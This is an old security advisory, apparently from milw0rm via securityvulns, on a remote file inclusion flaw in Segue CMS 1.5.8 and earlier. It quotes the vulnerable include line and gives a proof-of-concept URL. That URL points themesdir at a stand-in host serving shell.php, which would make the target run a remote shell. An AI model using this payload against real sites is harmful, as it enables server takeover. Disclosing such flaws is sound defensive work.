Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

2006-10-23T00:00:00
ID SECURITYVULNS:DOC:14802
Type securityvulns
Reporter Securityvulns
Modified 2006-10-23T00:00:00

Description

+------------------------------------------------------------------------------------------- + Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Affected Software .: Segue CMS <= 1.5.8 + Vendor ............: http://segue.middlebury.edu/ + Download ..........: http://sourceforge.net/project/showfiles.php?group_id=82171 + Description .......: "Segue is an open source collaborative content management system" + Class .............: Remote File Inclusion + Risk ..............: High (Remote File Execution) + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us> +------------------------------------------------------------------------------------------- + Details: + Segue CMS themes/program/themesettings.inc.php does not intialize the $themesdir variable + before using it to include files, assuming register_globals = on, we can intialize the + variable in a query string and include a remote file of our choice. Tested and working on + version 1.5.4 and 1.5.8 (previous versions may also be affected). + + Vulnerable Code: + themes/program/themesettings.inc.php, line(s) 02: include("$themesdir/$theme/colors.inc.php"); + + Proof of Concept: + http://[target]/[path]/themes/program/themesettings.inc.php?themesdir=http://evilsite.com/shell.php? +-------------------------------------------------------------------------------------------

milw0rm.com [2006-10-19]